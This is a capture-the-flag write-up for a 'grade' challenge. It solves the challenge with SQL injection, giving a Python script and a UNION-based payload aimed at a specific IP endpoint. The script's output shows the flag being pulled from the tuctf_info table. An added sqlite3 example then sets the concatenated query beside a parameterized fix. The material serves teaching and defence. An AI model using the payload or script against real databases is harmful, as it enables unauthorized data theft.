Descriptions: We are trying to find out what our grade was, but we don't seem to be in the database... Can you help us out? http://104.199.151.39/index.html
Solution:
1. The phrase "in the database..." in the description made me sure it is about SQL Injection.
2. The index page has a name input that shows the grade for that name.
3. View the source of index.html to get the script.
4. Line 46 is vulnerable to SQL Injection, but line 50 means the data is sent together with its md5 to postQuery.php via ajax.
5. In the Response tab, I found a comment that reveals the SQL query statement.
6. Write a Python script to extract the data step by step. Found Database: tuctf; Tables: tuctf_grades, tuctf_info, tuctf_junk; Columns: item, value. The flag is stored in tuctf_info.
7. select value from tuctf_info
Python Script:
#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
import requests, hashlib, sys

url = 'http://104.199.151.39/postQuery.php'
inp_str = sys.argv[1]  # value for the name field, taken from the command line
# The page's ajax code sends the input followed by a space and its md5 hex digest
md5_str = hashlib.md5(inp_str.encode('utf-8')).hexdigest()
send_str = inp_str+' '+md5_str
data = {'name': send_str, 'submit':1}
# .text gives the decoded response body; print() form runs on Python 2 and 3
content = requests.post(url, data=data).text
print(content)
'''
root@kali:~/Desktop# python grade.py "xyz%' union all select 1,(select value from tuctf_info);-- -"
<!--HI!--><!--Good auth!--><!--SELECT * FROM tuctf_grades WHERE name LIKE '%xyz%' union all select 1,(select value from tuctf_info);-- -%';--><tr><th>Name</th><th>Grade</th></tr><tr><td>1</td><td>TUCTF{v4ccinate_y0ur_databa5e5}</td></tr>
'''
Flag: TUCTF{v4ccinate_y0ur_databa5e5}
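The server-side flaw behind this solution, shown beside a parameterized fix. This is an added example, not code from the original post or from the challenge server. It assumes an in-memory sqlite3 database standing in for the real one, a two-column tuctf_grades table, constructed row values, and a server check of the form `<name> <md5(name)>`; all function names are hypothetical.

```python
import hashlib
import sqlite3

def make_db():
    # Constructed data: table names come from the write-up, rows and schema are assumed.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tuctf_grades (name TEXT, grade TEXT);
        CREATE TABLE tuctf_info (item TEXT, value TEXT);
        INSERT INTO tuctf_grades VALUES ('alice', 'A');
        INSERT INTO tuctf_info VALUES ('flag', 'PLACEHOLDER_SECRET');
    """)
    return db

def client_field(name):
    # What the write-up's script sends: the input plus an md5 computed by the client.
    return name + " " + hashlib.md5(name.encode()).hexdigest()

def checksum_ok(submitted):
    # Assumed server check. It only proves the client can compute md5, so any
    # input passes; it is an integrity echo, not authentication or validation.
    name, _, digest = submitted.rpartition(" ")
    return hashlib.md5(name.encode()).hexdigest() == digest, name

def lookup_concat(db, name):
    # Same shape as the query leaked in the response comment: input pasted into SQL text.
    sql = "SELECT * FROM tuctf_grades WHERE name LIKE '%" + name + "%';"
    return db.execute(sql).fetchall()

def lookup_bound(db, name):
    # Hardened: input is bound as data, and LIKE wildcards inside it are escaped.
    escaped = name.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT name, grade FROM tuctf_grades WHERE name LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + escaped + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Input string quoted in the write-up's terminal session.
    payload = "xyz%' union all select 1,(select value from tuctf_info);-- -"
    ok, name = checksum_ok(client_field(payload))
    print("checksum accepted:", ok)
    print("concatenated query:", lookup_concat(db, name))
    print("bound query:       ", lookup_bound(db, name))
    print("bound, normal name:", lookup_bound(db, "ali"))
```

With the bound query the same input is compared as a literal name and matches no row, while ordinary lookups still work.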